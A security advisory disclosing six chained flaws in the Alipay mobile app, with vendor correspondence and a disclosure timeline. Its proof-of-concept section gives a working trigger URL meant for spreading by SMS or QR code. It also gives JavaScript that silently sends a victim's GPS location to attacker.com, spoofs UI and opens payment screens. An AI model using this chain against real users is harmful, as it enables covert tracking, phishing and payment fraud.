Share
## https://sploitus.com/exploit?id=PACKETSTORM:217089
# Alipay Mobile App - DeepLink+JSBridge Unauthorized API Access Chain
# CVE Pending (MITRE Ticket #2005801)
# 6 Vulnerabilities, CVSS 7.4โ9.3
## Advisory Information
Title: Alipay DeepLink+JSBridge Attack Chain โ Silent GPS Exfiltration & Unauthorized API Access
Researcher: Jiqiang Feng (Innora AI Security Research)
Vendor: Ant Group / Alibaba Group
Product: Alipay (ๆฏไปๅฎ) v10.8.30.x (Android & iOS)
Users Affected: 1 billion+
Risk: Critical (CVSS 9.3)
CVE: 6 IDs pending (MITRE Ticket #2005801)
Vendor Response: "Normal functionality" โ refused to patch
Disclosure Timeline: Responsible disclosure Feb 25 โ Public Mar 11, 2026
## Summary
A single crafted URL enables a complete attack chain against Alipay mobile app users:
crafted link โ open redirect via trusted domain (ds.alipay.com) โ Alipay deep link handler โ attacker page loads in privileged WebView โ JSBridge APIs silently exfiltrate GPS, device data, and can initiate payment flows โ all without user consent or visible prompt.
## Vulnerability Details
### Vuln 1: Open Redirect Whitelist Bypass (CWE-601 + CWE-939, CVSS 9.3)
ds.alipay.com accepts a "scheme" parameter that redirects to arbitrary alipays:// URLs.
Since ds.alipay.com is whitelisted, this bypasses all URL validation in the Alipay client.
Attack URL:
https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&url=[ATTACKER_URL]
### Vuln 2: Silent GPS Exfiltration (CWE-359, CVSS 7.4)
AlipayJSBridge.call('getLocation') returns GPS coordinates (8.8m accuracy) silently.
No user prompt, no consent dialog, completes in 7 seconds.
### Vuln 3: Unauthorized Payment Initiation (CWE-940, CVSS 8.6) [iOS only]
AlipayJSBridge.call('tradePay') can pre-fill and present payment screens.
Combined with "small amount password-free payment" feature, may enable zero-interaction payment.
### Vuln 4: UI Spoofing (CWE-451, CVSS 8.1)
AlipayJSBridge.call('showToast') and AlipayJSBridge.call('setTitle') allow attackers
to display fake system notifications and modify the WebView title bar.
### Vuln 5: Device Fingerprinting (CWE-200, CVSS 8.6)
AlipayJSBridge.call('getSystemInfo'), getNetworkType, getCameraPermission,
getMicrophonePermission expose device model, OS, carrier, sensor permissions.
### Vuln 6: DeepLink URL Scheme Handler Bypass (CWE-939, CVSS 9.1)
The alipays:// scheme handler loads external URLs in privileged WebView context
without proper origin validation, granting full JSBridge API access.
## Exploitable JSBridge APIs (Verified)
| API | Data Extracted | Android | iOS |
|-------------------|-----------------------------------|---------|-----|
| getLocation | GPS coords (8.8m accuracy) | Yes | Yes |
| getNetworkType | WiFi/cellular, carrier info | Yes | Yes |
| getSystemInfo | Device model, OS, screen | Yes | Yes |
| tradePay | Pre-fill payment screen | No | Yes |
| share | Trigger share dialog | No | Yes |
| scan | Activate QR scanner | No | Yes |
| chooseImage | Access photo picker | No | Yes |
| setTitle | Modify WebView title (UI spoof) | Yes | Yes |
| showToast | Fake system notifications | Yes | Yes |
## Proof of Concept
### Step 1: Trigger URL (distribute via SMS/email/QR)
https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&url=https%3A%2F%2Finnora.ai%2Fzfb%2Fpoc%2Fverify.html
### Step 2: JSBridge exploitation code (runs inside Alipay WebView)
```javascript
// Wait for bridge
document.addEventListener('AlipayJSBridgeReady', function() {
// Silent GPS exfiltration
AlipayJSBridge.call('getLocation', {}, function(result) {
// result.latitude, result.longitude โ 8.8m accuracy
// Exfiltrate to attacker server
fetch('https://attacker.com/collect', {
method: 'POST',
body: JSON.stringify({
lat: result.latitude,
lng: result.longitude,
city: result.city
})
});
});
// Device fingerprinting
AlipayJSBridge.call('getSystemInfo', {}, function(info) {
// info.brand, info.model, info.system, info.version
});
// UI spoofing
AlipayJSBridge.call('setTitle', {title: 'Alipay Security Center'});
AlipayJSBridge.call('showToast', {content: 'Verification successful'});
// iOS only: payment initiation
AlipayJSBridge.call('tradePay', {tradeNO: 'ATTACKER_ORDER'});
});
```
## Verification Evidence
- 3 test devices: Samsung S25 Ultra (NZ), Xiaomi Redmi 12 (MY), iPhone 16 Pro (CN)
- 308 server-side GPS exfiltration logs with real coordinates
- 42 verification screenshots
- Vendor's security lead tested on iPhone from Hangzhou (Alipay HQ) โ GPS captured silently in 7s
- iOS exposes 5 additional critical APIs vs Android
## Disclosure Timeline
2026-02-25 Initial TLS/SSL report to vendor
2026-03-06 Vendor: "cannot be practically exploited"
2026-03-07 Expanded report: 17 vulns with full end-to-end proof
2026-03-07 Whitelist bypass achieved in 2 minutes during live call with vendor's security lead
2026-03-08 Vendor security lead's own iPhone tested โ GPS captured
2026-03-10 Vendor final response: "normal functionality"
2026-03-11 Public disclosure
2026-03-11 Vendor's law firm files takedown complaint (4 hours after publication)
2026-03-12 6 CVEs submitted to MITRE CNA-LR (Ticket #2005801)
## References
Technical Report: https://innora.ai/zfb/
PoC Demo Page: https://innora.ai/zfb/poc/trigger.html
Rebuttal to Legal Complaint: https://innora.ai/zfb/rebuttal.html
## Credits
Jiqiang Feng โ Innora AI Security Research
feng@innora.ai | https://innora.ai